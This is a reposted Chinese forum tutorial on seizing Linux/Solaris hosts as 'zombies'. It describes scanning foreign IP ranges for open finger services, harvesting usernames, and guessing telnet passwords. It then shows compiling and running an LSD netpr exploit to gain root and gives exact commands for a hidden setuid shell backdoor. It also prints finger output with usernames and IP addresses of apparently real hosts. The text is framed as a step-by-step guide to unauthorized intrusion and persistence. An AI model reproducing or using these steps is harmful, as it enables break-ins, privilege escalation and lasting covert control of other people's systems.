获得你的第一只LINUX肉鸡 LINUX现在是越来越多的和大家在一起了,虽然本人的电脑还没有装,但这并没什么,搞个肉鸡就什么都有了,下面我们开始了推荐网址IP段 日本,美国,印尼软件 SUPERSCAN 流光首先我们用SUPERSCAN扫79端口的IP,看看有哪些机子开了这个端口,也就是FINGER服务,扫到后我们算是成功了第一步,不过别高兴太早,至于为什么向下看吧然后我们用流光开扫,流光就是方便,可以猜解出开了FINGER服务的主机帐户名,但是也许你这时就会发现流光给出了以下提示。。。。。。FINGER开放。。。。。。获得用户列表 禁止呵呵,我说吧,别高兴太早,没办法重来,在用SUPERSCAN来扫,这回看看我们的手气如何扫到开了79端口的的一整个IP段。太爽了流光接着扫,呵呵,终于熟悉的画面出现了 Login Name TTY Idle When Where daemon ??? < . . . . > bin ??? < . . . . > sys ??? < . . . . > jeffrey ??? pts/0 <Jun 10 07:12> 203.66.149.11 daniel ??? 437 <Nov 8, 2000> 114cm.kcable. jamie ??? 0 <Sep 12, 2000> 203.66.162.68 postgres ??? pts/2 <Sep 9, 2000> 203.66.162.80 nsadmin ??? 768 <Jul 4 17:26> 203.66.19.50 ho ??? 390 <Nov 23, 2000> 61.169.209.106 house18 ??? pts/1 <Jan 17 16:17> 203.66.250.1 tong ??? pts/0 <Jul 2 13:21> 210.226. 42.69 呵呵,看来手气确实不错,转到TELNET TELNET IP 我习惯的方式是猜密码,一个一个来,可能由于我懒,不过希望大家可以结合工具来破,要不到你没有耐心时候就会说我骗人了:) USER TONG PASSWD TONG 错了就在来,总有一个会对的看看我们进来了接下来你要看看本机有没有GCC $ gcc gcc: No input files 看到没有,手气好没办法 $ uname �Ca 看一下子系统是什么版本的这样有助于你找到合适的EXPLOIT,然后提升权限你可以采用上传的方法也可以用cat > test.c 自已写EMPLOIT 找到相应的EXPOLIT时你就可以用以下的命令了 $ gcc -o test test.c进行编译 $ ./test copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/ /usr/lib/lp/bin/netpr solaris 2.7 sparc usage: ./test lpserver $ ./test localhost 本机上的 copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/ /usr/lib/lp/bin/netpr solaris 2.7 sparc # id uid=1035(delex) gid=20(staff) euid=0(root) 看到没有,你现在在这台机子上就是ROOT了,下面你就可以做后门了 # mkdir /usr/lib/... # cp /bin/ksh /usr/lib/…/.x (***做个简单的后门***) # chmod +s /usr/lib/…/.x 以后只要你运行以下的命令就可以成为ROOT了 $ /usr/lib/.../.x 现在它就是你的肉鸡了,以后用流光扫IP时,你在发现哪台机子有什么LPD,RPC等溢出漏洞时,你就可以上你的肉鸡,然后找到相应的EXPOLIT远程溢出它了,步骤都大同小意 呵呵,这也没什么技术含量,主要是引导大家如何去控制一台LINUXE主机,献丑了
|
论坛用户
论坛: UNIX系统 标题: [转帖]获得你的第一只LINUX肉鸡